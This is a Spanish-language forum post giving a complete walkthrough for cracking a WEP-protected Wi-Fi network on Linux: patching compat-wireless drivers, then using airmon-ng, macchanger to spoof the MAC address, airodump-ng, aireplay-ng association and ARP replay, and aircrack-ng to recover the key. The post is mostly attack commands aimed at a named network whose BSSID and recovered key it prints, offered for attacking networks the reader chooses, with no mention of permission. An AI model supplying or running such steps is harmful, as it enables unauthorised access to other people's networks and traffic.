Antes que nada el sistema que uso es Linux Mint 11 Katya, es mi segundo post, espero les agrade y les sirva de algo.
Como pueden ver me gusta los Libros de Harry Potter
El primer paso es saber que kernel tenemos instalado, como ven en la captura anterior ahí viene debajo de la versión, para entrar ahí tenemos que dirigirnos al menú, después administración, luego monitor de sistema e ir ala pestaña de sistema y ahí encontraremos el numero de kernel.
Cuando tengamos el numero de kernel, visitamos esta pagina, http://wireless.kernel.org/en/users/Download/stable/
Como pueden ver di clic al 2.6.38 que es mi kernel y me mando a la parte de abajo que es de donde tenemos que descargar el archivo.
Elegimos el primero y lo descargamos:
Vamos al lugar donde se guardo el archivo y lo copiamos en la raíz de tu carpeta personal.
seria en la dirección /home/(tu usuario).
Ahora trabajaremos en la terminal: (de ahora en adelante las capturas serán de acuerdo a la versión de mi kernel)
nos logueamos como Root, (yo utilizo sudo -s)
El primer paso es:
tar -jxf compat-wireless-2.<versión de su núcleo>
Segundo paso:
cd compat-wireless-2<versión de su núcleo>
Tercer paso: (a partir de aquí los pasos son idénticos para todos los kerneles)
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
Cuarto paso:
sudo apt-get install patch
Quinto paso:
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
Sexto paso: **este paso tarda un poco de tiempo
make
Séptimo paso: **También tarda un poco
make install
Octavo paso:
make unload
Ultimo paso: ** Se reiniciara la pc
reboot
Comienza el ataque..
Nota: Hay que tener instalado la suite aricrack y el macchanger.. prueba con estos comandos
sudo apt-get install aircrack-ng
sudo apt-get install macchanger
1.- Lo primero que haremos es abrir una terminal y loguearnos como root
sudo -s ** poner contraseña
2.- Establecer la tarjeta inalámbrica en modo monitor
airmon-ng start wlan0 ** generalmente wlan0 es nuestra interfaz inalámbrica para saber exactamente cual es usa el comando "ifconfig"
3.- Cambiar la dirección MAC de nuestra tarjeta **Verificar que numero se le asigno, en mi caso fue mon0 pero puede ser cualquier otro
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55
ifconfig mon0 up
4.- Escanear en busca de redes
airodump-ng mon0 **aquí hay que identificar la red a la que vamos a atacar, en mi caso el essid es "malena" el canal "11" y la dirección mac es "64:16: F0:3A:C9:6D"
5.- Siguiente codigo
airodump-ng -c (canal de la red CH) -w (nombre con el que guardaremos el archivo) --bssid (dirección mac del módem seleccionado) mon0 ** Solo sustituyan los valores de la red que quieren crackear. En mi caso seria:
airodump-ng -c 11 -w ejemplo --bssid 64:16: F0:3A:C9:6D mon0 ** La dirección MAC va sin espacios pero al poner : F pegado sale esto
6.-Abrir otra terminal y loguearnos como root(Control+MayusIzq+T) y escribir lo siguiente, para crear una asociación entre nuestra pc y el módem:
aireplay-ng -1 0 -e (nombre de la red "essid"
-a (dirección mac del módem) -h 00:11:22:33:44:55 mon0 **Sustituir con los valores de su red. En mi caso seria:
aireplay-ng -1 0 -e malena -a 64:16: F0:3A:C9:6D -h 00:11:22:33:44:55 mon0** La dirección MAC va sin espacios pero al poner : F pegado sale esto
7.-Al terminar la asocianon tecleamos lo siguiente:
aireplay-ng -3 -b (dirección mac del módem) -h 00:11:22:33:44:55 mon0 **Sustituir con los valores de su red. En mi caso seria:
aireplay-ng -3 -b 64:16: F0:3A:C9:6D -h 00:11:22:33:44:55 mon0** La dirección MAC va sin espacios pero al poner : F pegado sale esto
Despues de este paso esperaremos a llegar a los 50,000 paquetes, después de que llegue haremos lo siguiente:
8.- Abrir otra terminal y loguearnos como root(Control+MayusIzq+T) y escribir lo siguiente para empezar a descifrar la clave
aircrack-ng *.cap
Nos pregunta cual es la red que queremos descifrar, ponemos el numero y esperamos.
La clave es la que esta dentro de los corchetes sin los dos puntos. "8418441726"
Notas: La rapidez con la que hagamos el proceso dependerá de la distancia que estemos del módem y del trafico que tenga la red. al utilizar el comando aircrack-ng y la clave no aparezca, deja la computadora trabajando, al juntar 5,000 paquetes mas automáticamente reiniciara el proceso.
A mi me basto con los siguientes paquetes para descifrar.
Eso fue todo, espero y les sirva, cualquier duda comenten o manden un MP, Tarde mucho en armar el post sepan valorar Por favor